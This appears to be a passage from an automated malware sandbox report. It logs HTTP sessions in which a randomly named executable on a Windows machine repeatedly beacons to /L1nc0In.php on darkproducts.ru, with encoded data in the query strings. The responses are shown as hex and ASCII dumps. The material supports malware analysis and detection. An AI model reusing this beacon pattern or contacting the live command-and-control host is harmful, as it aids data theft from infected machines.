59 35 63 54 4f 31 55 6d 49 36 49 43 5a 35 51 47 5a 78 67 54 4e 6b 4e 57 4d 6b 5a 54 4f 77 4d 54 4e 68 56 6a 59 68 52 57 4d 68 52 47 4d 30 59 6d 4d 34 59 57 4e 79 49 43 4c 69 59 57 55 76 64 33 54 70 70 55 65 61 68 6c 55 35 70 46 57 61 56 6e 59 77 34 55 4e 5a 4a 54 4e 73 4e 6d 62 4b 46 54 57 78 6b 54 64 68 64 46 5a 78 49 47 53 43 5a 6e 57 58 4e 57 61 4a 4e 55 51 4c 78 30 51 4a 74 57 53 71 39 57 61 50 56 6b 57 56 5a 6c 56 35 4d 6e 59 79 6f 45 64 6c 5a 6c 54 31 6b 6c 4d 31 77 32 59 75 70 55 4d 5a 46 54 4f 31 46 32 56 6b 46 6a 59 49 4a 6b 64 61 64 31 59 70 6c 30 51 42 74 45 54 44 6c 30 61 4a 70 32 62 70 4a 32 52 35 6b 6d 59 59 78 47 56 6c 64 6c 54 31 70 46 57 4b 6c 48 5a 58 35 6b 5a 69 31 47 62 75 52 32 56 34 64 6e 59 79 59 6c 62 4a 6c 57 51 6e 4e 55 61 33 6c 6d 55 47 35 6b 56 4a 70 32 62 70 70 31 56 53 5a 58 55 7a 77 6d 61 69 31 6d 56 35 4e 6d 62 57 70 47 57 79 55 44 63 61 [TRUNCATED] Data Ascii: 874=0nI0QWN3IGN1MWNmFWY4MmZyYGZzImZzkTY4QWY5cTO1UmI6ICZ5QGZxgTNkNWMkZTOwMTNhVjYhRWMhRGM0YmM4YWNyICLiYWUvd3TppUeahlU5pFWaVnYw4UNZJTNsNmbKFTWxkTdhdFZxIGSCZnWXNWaJNUQLx0QJtWSq9WaPVkWVZlV5MnYyoEdlZlT1klM1w2YupUMZFTO1F2VkFjYIJkdad1Ypl0QBtETDl0aJp2bpJ2R5kmYYxGVldlT1pFWKlHZX5kZi1GbuR2V4dnYyYlbJlWQnNUa3lmUG5kVJp2bpp1VSZXUzwmai1mV5NmbWpGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUb0lnYxwmZkJjVPxUM4hWWywWeadVMClkavlmWXVjdl1mV0FGWSZmYt
Jan 3, 2025 17:01:59.274878979 CET	1236	IN	Data Raw: 78 6d 62 6b 64 46 65 33 4a 6d 4d 57 35 57 53 70 46 30 5a 44 6c 32 64 70 31 45 52 4a 6c 32 54 70 70 6b 65 6b 64 46 62 72 6c 6c 56 4b 56 54 57 79 59 55 65 6b 64 6c 54 71 46 31 56 31 59 58 59 59 4a 46 61 5a 4a 54 4f 7a 68 6c 4d 31 41 6e 57 7a 59 31 Data Ascii: xmbkdFe3JmMW5WSpF0ZDl2dp1ERJl2TppkekdFbrllVKVTWyYUekdlTqF1V1YXYYJFaZJTOzhlM1AnWzY1cjdUOspVeJdWSB92cJp2Zy0ERBVnTENGdJp2bpp1VSFDZHxmbi1WOzhlM1AnWzY1cjdUOspVeJdWSB92cJpWT51EVjVXTEFVaPlmSspFSWBTYYJFaiZUO1F2VkFjYIJkdad1Ypl0QBtETDpEaZJDb5p1VxIUSHhGM
Jan 3, 2025 17:01:59.274930954 CET	526	IN	Data Raw: 6c 32 64 70 4e 6d 4d 77 67 58 53 71 39 57 61 6c 64 6c 52 7a 70 31 56 53 5a 6d 59 74 78 6d 62 6b 64 46 65 33 4a 6d 4d 57 35 57 53 70 46 30 5a 44 6c 32 64 33 31 45 52 4a 5a 54 53 75 35 55 4d 6b 64 6b 52 77 4d 57 4d 35 55 58 59 58 52 57 4d 69 68 6b Data Ascii: l2dpNmMwgXSq9WaldlRzp1VSZmYtxmbkdFe3JmMW5WSpF0ZDl2d31ERJZTSu5UMkdkRwMWM5UXYXRWMihkQ2p1VjlWSDF0SMNUS18ERFVXT6lEeMpWWwwkanl2TppEMjJjVxM2VWlHWyUDcaNjVzN2R5wmW5l0ZJFEc3IiOigjNmFDNwMGM0kzNzYjYwIWO2IWO1UGN1ADNzYTM0kTMiwiINpWVxklMG5mYuZ1bZNjVyl1V0BTW
Jan 3, 2025 17:02:00.314981937 CET	858	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI5cDMmljY5gDOkFTMmBjYkZzMjdDOiRmZ0UDO5YWZiJzM5QWZ4YWZwIiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:02:00.535478115 CET	816	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:02:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KsjDbmT0p6qvN6nUC%2BiLj283rS53rr3m%2BbbK4loSUrh7dhObA5tUyg1c8iIvSFF7Wj%2BHHly6NHpyta9l%2FgNfI04pyT7NkYHshiGz892RzX1Yb%2FhMf1Rtce%2BZSOztkAiBfqLVZFkNelsWoA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc435f048e3c470-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1670&rtt_var=641&sent=6&recv=5&lost=0&retrans=0&sent_bytes=2998&recv_bytes=1332&delivery_rate=3371824&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 3, 2025 17:02:00.536457062 CET	1405	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&1aa2aa90917c447227433aa68c631e46=QX9JSUmlWTYplbGdUVnl0VahlQTpVdsdkYtplMUNGexM2M5ckW1xmMWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI5cDMmljY5gDOkFTMmBjYkZzMjdDOiRmZ0UDO5YWZiJzM5QWZ4YWZw [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:02:00.756141901 CET	810	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:02:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0zwjKCGhwmzJX7TDtDpHp9xzhRWlxAmluaOCHlYxvGSugwpY7VZfZHdydct3MkY%2BOpm5jtAZsWq5Trbw1KfYIO6Dz1kOBYN0u4ZLue5WPBbfqr4Sa%2BWA7xtWF2bLswdJ1GsGs5c8nY2dA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc435f1aaa2c470-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7566&min_rtt=1670&rtt_var=12259&sent=9&recv=8&lost=0&retrans=0&sent_bytes=3814&recv_bytes=2737&delivery_rate=3371824&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:02:00.321329117 CET	2260	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0Uih [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:02:01.010272026 CET	933	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:02:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rIEbOWYl%2BBdFqIqisyLJinFig82Dk6J2amP72Zo6mbQlyfKs2cDVU7JUpxFbk4y8tO6cYjwOvAT5JKh9wCKiOHuiIVtUXKCJzU8QUVVaD31IS0QwHiCiT6BRZIiCKrFUNzzvrWtrwL%2FkEg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc435f28a00efa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2034&rtt_var=1017&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2260&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:02:06.168746948 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49711	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:02:11.201867104 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:02:11.894176960 CET	935	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:02:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=guKfyWP0Cf%2ByYya18LsxaELqkW5zoSahZBpbV67aoLEhCmOOBtytcEuuWfm4o2syO7C3MLc6Y4baprKZt3TsDxau4r0A%2BM5fx%2B2zE4pA6nhg18U8zCxNo7UUKrrZOT0WU18SRLvWupmRRA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc436368d4a42d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2217&min_rtt=2217&rtt_var=1108&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49737	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:02:16.933132887 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:02:17.646152020 CET	938	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:02:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EOlBSdv4zQOWjEVEIw8kXdYywWgews3O2%2FirUgI%2FOapik4aer3j24oTd%2BFxIDayaCk5LPqGv4WXOYxDaJBqzS9JmxaMo2UqfiRdKiFp%2BtTgYQSn5DVYYOqRJ3VquvpLY%2FR0drevGKn71RQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc4365a6e447c87-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1992&rtt_var=996&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49771	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:02:22.681060076 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:02:23.399913073 CET	932	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=htWs1mTFH3Gtm2lrmZe9jCC%2F01qnwFdBfgZtnai5by2Oyi6oGTmC4I4C9tD3gy3aRXf6kqohnrmN1wLdBUzloxZeN6RREjz4FCavSU6ZcSSyXDnHwXidsxe1LmZohbWhvN32DYUNzzm%2Blw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc4367e5fa76a4f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1676&rtt_var=838&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 